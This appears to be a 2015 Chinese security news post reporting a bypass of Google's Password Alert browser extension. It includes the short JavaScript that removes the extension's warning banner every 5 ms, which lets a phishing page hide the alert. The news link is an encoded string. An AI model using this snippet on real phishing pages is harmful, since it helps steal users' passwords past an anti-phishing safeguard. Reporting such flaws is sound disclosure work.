-
-
安全扩展不安全 谷歌Password Alert被发现存在绕过漏洞
-
-
安全扩展不安全 谷歌Password Alert被发现存在绕过漏洞
新闻链接:
291K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4F1j5X3g2@1j5g2)9J5k6h3y4G2L8g2)9J5c8X3q4J5N6r3W2U0L8r3g2K6i4K6u0r3x3K6V1H3x3o6V1%4i4K6u0W2K9s2c8E0
新闻时间:2015-05-01 07:57:04
新闻正文:
该漏洞由国外安全机构发现并通知给科技网站Arstechnica。研究人员表示,与其花费精力在开发这些意义不大的扩展上,还不如提高谷歌账户的安全性和验证措施。
漏洞核心的绕过代码原理其实并不复杂,通过每5ms执行一次下列所示的js代码,就能将该扩展显示的警告信息屏蔽,虽然理论上该扩展还是能显示警告信息,但5ms的时间人类是察觉不到的。核心代码如下:
<!-- BYPASS GOOGLE'S PASSWORD ALERT "PROTECTION" -->
<script type="text/javascript">
setInterval(function() {
if(document.getElementById("warning_banner")) {
document.getElementById("warning_banner").remove();
}
}, 5);
<script>
验证视频:
Bypassing-Googles-Password-Alert-Protection-YouTube.mp4
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
